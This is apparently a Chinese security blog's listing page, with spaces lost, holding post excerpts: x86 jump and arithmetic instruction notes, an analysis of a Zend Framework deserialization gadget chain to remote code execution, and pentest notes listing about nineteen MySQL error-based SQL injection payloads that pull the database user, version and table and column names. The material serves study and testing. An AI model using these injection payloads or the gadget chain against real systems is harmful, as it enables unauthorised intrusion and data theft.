逆向

JCC指令也只影响EIP首先要明确一点,所有的判断跳转指令都是根据标志位来进行判断的1、JE,JZ结果为零则跳转(相等时跳转)ZF=12、JNE,JNZ结果不为零则跳转(不相等时跳转)ZF=03、JS结果为负则跳转SF=14、JNS结果为非负则跳转SF=05、JP,JPE结果中1的个数为偶数则跳转PF=16、JNP,JPO结果中1的个数为偶数则跳转PF=07、JO结果溢出了则跳OF=18、JNO结果没有溢出则跳转OF=09、JB,JNAE小于则跳转(无符号数)CF=110、JNB,JAE大于等于则跳转(无符号数)CF=011、JBE,JNA小于等于则跳转(无符号数)CF=1orZF=112、JNBE,JA大于则跳转(无符号数)CF=0andZF=013、JL,JNGE小于则跳转(有符号数)SF≠OF14、JNL,JGE大于等于则跳转(有符号数)SF=OF15、JLE,JNG小于等于则跳转(有符号数)ZF=1orSF≠OF16、JNLE,JG大于则跳转(有符号数)ZF=0andSF=OF有符号无符号的区别:CMPAL,CLJG0x12345678JA0x12345678英文全称含义判断标志位JE,JZjumpequal,jumpzero结果为零则跳转(相等时跳转)ZF=1JNE,JNZjumpnotequal,jumpnotzero结果不为零则跳转(不相等时跳转)ZF=0JSjumpsign结果为负则跳转SF=1JNSjumpnotsign结果为非负则跳转SF=0JP,JPEjumpparity,jumpparityeven结果中1的个数为偶数则跳转PF=1JNP,JPOjumpnotparity,jumpparityodd结果中1的个数为偶数则跳转PF=0JOjumpoverflow结果溢出了则跳转OF=1JNOjumpnotoverflow结果没有溢出则跳转OF=0JB,JNAEjumpbelow,jumpnotaboveequal小于则跳转(无符号数)CF=1JNB,JAEjumpnotbelow,jumpaboveequal大于等于则跳转(无符号数)CF=0JBE,JNAjumpbelowequal,jumpnotabove小于等于则跳转(无符号数)CF=1orZF=1JNBE,JAjumpnotbelowequal,jumpabove大于则跳转(无符号数)CF=0andZF=0JL,JNGEjumpless,jumpnotgreaterequal小于则跳转(有符号数)SF≠OFJNL,JGEjumpnotless,jumpgreaterequal大于等于则跳转(有符号数)SF=OFJLE,JNGjumplessequal,jumpnotgreater小于等于则跳转(有符号数)ZF=1orSF≠OFJNLE,JGjumpnotlessequal,jumpgreater大于则跳转(有符号数)ZF=0andSF=OF

2021-6-20 1 0
2021-6-16 4 0
逆向

滴水逆向视频笔记:符号含义r寄存器m内存imm立即数r88位通用寄存器m88位内存imm88位立即数#MOV指令MOV目标操作数,源操作数MOVr/m8,r8MOVr/m16,r16MOVr/m32,r32MOVr8,r/m8MOVr16,r/m16MOVr32,r/m32MOVr8,imm8MOVr16,imm16MOVr32,imm32作用:拷贝源操作数到目标操作数源操作数可以是立即数、通用寄存器、段寄存器、或者内存单元目标操作数可以是通用寄存器、段寄存器或者内存单元操作数的宽度必须一样源操作数和目标操作数不能同时为内存单元#ADD指令ADDr/m8,imm8ADDr/m16,imm16ADDr/m32,imm32ADDr/m16,imm8ADDr/m32,imm8ADDr/m8,r8ADDr/m16,r16ADDr/m32,r32ADDr8,r/m8ADDr16,r/m16ADDr32,r/m32MOVeax,1addeax,2eax值最后为3ADD目标操作数,源操作数作用:将源操作数加到目标操作数上#SUB指令SUB的语法:SUBr/m8,imm8SUBr/m16,imm16SUBr/m32,imm32SUBr/m16,imm8SUBr/m32,imm8SUBr/m8,r8SUBr/m16,r16SUBr/m32,r32SUBr8,r/m8SUBr16,r/m16SUBr32,r/m32SUB目标操作数,源操作数作用:将源操作数减到目标操作数上#AND指令AND的语法:ANDr/m8,imm8ANDr/m16,imm16ANDr/m32,imm32ANDr/m16,imm8ANDr/m32,imm8ANDr/m8,r8ANDr/m16,r16ANDr/m32,r32ANDr8,r/m8ANDr16,r/m16ANDr32,r/m32AND目标操作数,源操作数作用:将源操作数与目标操作数与运算后将结果保存到目标操作数中moveax,2addEAX,32的二进制00103的二进制00110010and0011值为2#OR指令OR的语法:ORr/m8,imm8ORr/m16,imm16ORr/m32,imm32ORr/m16,imm8ORr/m8,r8ORr/m16,r16ORr/m32,r32ORr8,r/m8ORr16,r/m16ORr32,r/m32OR目标操作数,源操作数作用:将源操作数与目标操作数或运算后将结果保存到目标操作数中moveax,2OREAX,30010|0011结果为3#XOR指令XOR的语法:XORr/m8,imm8XORr/m16,imm16XORr/m32,imm32XORr/m16,imm8XORr/m8,r8XORr/m32,r32XORr8,r/m8XORr16,r/m16XORr32,r/m32XOR目标操作数,源操作数作用:将源操作数与目标操作数异或运算后将结果保存到目标操作数中moveax,2xorEAX,30010XOR0011结果为0001结果为1#NOT指令NOT的语法:NOTr/m8NOTr/m16NOTr/m32NOT操作数作用:取反moveax,2NOTEAX2的二进制0010取反11011101的值为D

2021-6-14 6 0
2021-6-7 12 0
2021-1-19 125 0
应用安全

Zend框架反序列化漏洞复现分析1.环境安装composer下载composercreate-projectzendframework/skeleton-application然后进入目录php-S0.0.0.0:8099-tpublic启动修改module/Application/src/Controller/IndexController.php生成poc,poc.php发送请求,环境搭建成功2.漏洞分析:查看POC根据POC进行分析1.Zend\Http\Response\Stream__destruct方法中的unlink,unlink函数的第一个参数为String类型,如果$this->streamName为一个类,即可触发__toString方法2.Zend\View\Helper\Gravatar根据$a=newZend\Http\Response\Stream($b);对Zend\View\Helper\Gravatar进行分析__toString调用了getImgTag方法,跟进getImgTag跟进setSrcAttribForImg发现attributes参数可控,跟进htmlAttribs$this->getView(),发现$view可控也就是我们可以控制$this->getView(),3.根据$b=newZend\View\Helper\Gravatar($c);$this->getView()则为newZend\View\Renderer\PhpRenderer类,跟进PhpRenderer,PhpRenderer有plugin方法跟进getHelperPluginManager,$__helpers也是可以控制的也就是$this->getHelperPluginManager()可以控制3.$c=newZend\View\Renderer\PhpRenderer($d);$b为Zend\Config\ReaderPluginManager。跟进ReaderPluginManager,该类中没有get方法,但是该类继承AbstractPluginManager,跟进AbstractPluginManager,get方法Has方法的$name为escapehtml,$name为escapehtml,$options不可控只能为空,所以$instance从parent:get取值,跟进parent:get因为$escaper=$this->getView()->plugin('escapehtml');$escapeHtmlAttr=$this->getView()->plugin('escapehtmlattr');所以$this->services需要有2个key,$this->services=["escapehtml"=>$services,"escapehtmlattr"=>$services];根据$d=newZend\Config\ReaderPluginManager($e);$e为$e=newZend\Validator\Callback();所以也就是$this->services需要为Zend\Validator\Callback,继续跟进validate,$this->instanceOf可控,需要为Zend\Validator\Callback()$escaper为Zend\Validator\Callback(),key为1调用的时候会自动调用,__invoke,然后调用isValid。跟进isValid139行有个call_user_func_array,$args为1,$callback=$this->getCallback(),跟进getCallback所以$options,也可以控制。最后导致RCE。所以整体利用链如下:1.Zend\Http\Response\Stream->__destruct()中的unlink()触发Zend\View\Helper\Gravatar->__toString()方法2.Zend\View\Helper\Gravatar->__toString()调用Zend\View\Helper\Gravatar->getImgTag()方法,最后触发了AbstractHtmlElement.php:73的htmlAttribs方法1.htmlAttribs中的$this->getView()->plugin为PhpRenderer的plugin,$this->getView(),PhpRenderer->plugin调用了getHelperPluginManager,etHelperPluginManager的__helpers可控2.控制__helpers需要为Zend\Config\ReaderPluginManager,Zend\Config\ReaderPluginManager,没有get方法ReaderPluginManager继承AbstractPluginManager,所以调用了AbstractPluginManager->get,后续调用了ServiceManager->get,AbstractPluginManager继承,ServiceManager,services和instanceOf可控,所以只需要序列化ReaderPluginManager时指定services和instanceOf,$escaper等于AbstractPluginManager->get返回的instanceOf,也就是Zend\Validator\Callback(),当$escaper($key)的时候会触发Zend\Validator\Callback->__invoke(),终执行Zend\Validator\Callback-isValid()中的call_user_func_array

pentest

1.floor()floor和groupby搭配使用利用groupby的key唯一性和mysql编码执行顺序导致二次执行产生不同keyselect*fromuserswhereid=1OR+1e0GROUPBY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))HAVING+MIN(0)OR+1数值型注入时不用闭合‘进行注入利用or条件注入通用型的一般格式注入select*fromuserswhereid=1and(select1from(selectcount(*),concat(user(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)2.extractvalue对XML文档进行查询的函数和updatexml()一样针对5.5版本以后select*fromuserswhereid=1andextractvalue(1,concat(0x7e,user()))3.updatexml()select*fromtestwhereid=1andupdatexml(1,concat(0x7e,user()),1)4.geometrycollection()select*fromtestwhereid=1andgeometrycollection((select*from(select*from(selectuser())a)b));5.multipoint()select*fromtestwhereid=1andmultipoint((select*from(select*from(selectuser())a)b));6.polygon()select*fromtestwhereid=1andpolygon((select*from(select*from(selectuser())a)b));7.multipolygon()select*fromtestwhereid=1andmultipolygon((select*from(select*from(selectuser())a)b));8.linestring()select*fromtestwhereid=1andmultilinestring((select*from(select*from(selectuser())a)b));9.multilinestring()select*fromtestwhereid=1andmultilinestring((select*from(select*from(selectuser())a)b));10.exp()exp()即为以e为底的对数函数exp(709)里面的参数在大于709时函数会报错ERROR1690(22003):DOUBLEvalueisoutofrangein'exp(710)'select*fromtestwhereid=1andexp(~(select*from(selectuser())a));11.procedureanalyseselect*fromusersorderby1procedureanalyse(extractvalue(rand(),concat(0x3a,version())),1)12.用户变量selectmin(@a:=1)frominformation_schema.tablesgroupbyconcat(database(),@a:=(@a+1)%2)13.通过NAME_CONST(适用于低版本)+or+(select*from(selectNAME_CONST(version(),1),NAME_CONST(version(),1))asx)14.0位取反报错(BIGINT溢出)select~0+!(select*from(selectuser())x);15.atan,ceil,floor,!,...相减溢出select!atan((select*from(selectuser())a))-~0;select!ceil((select*from(selectuser())a))-~0;select!floor((select*from(selectuser())a))-~0;select!HEX((select*from(selectuser())a))-~0;select!RAND((select*from(selectuser())a))-~0;select!FLOOR((select*from(selectuser())a))-~0;select!CEILING((select*from(selectuser())a))-~0;select!RAND((select*from(selectuser())a))-~0;select!TAN((select*from(selectuser())a))-~0;select!SQRT((select*from(selectuser())a))-~0;select!ROUND((select*from(selectuser())a))-~0;select!SIGN((select*from(selectuser())a))-~0;16.@:=!(select*from(select(concat(@:=0,(selectcount(*)from`information_schema`.columnswheretable_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0(select(!x-~0)from(select(concat(@:=0,(selectcount(*)from`information_schema`.columnswheretable_schema=database()and@:=concat(@,0xa,table_name,0x3a3a,column_name)),@))x)a)(select!x-~0.from(select(concat(@:=0,(selectcount(*)from`information_schema`.columnswheretable_schema=database()and@:=concat(@,0xa,table_name,0x3a3a,column_name)),@))x)a)17.^按位异或select!(select*from(selectuser())a)-0^222;18.0位表减溢出(select(!x-~0)from(select(selectuser())x)a)(select!x-~0.from(select(selectuser())x)a)19.in溢出select*fromuserswhereidin(~0+!(select*from(selectuser())x))要记住的是这些错误函数显示都是有长度限制的

2020-11-26 231 0
2020-11-16 234 0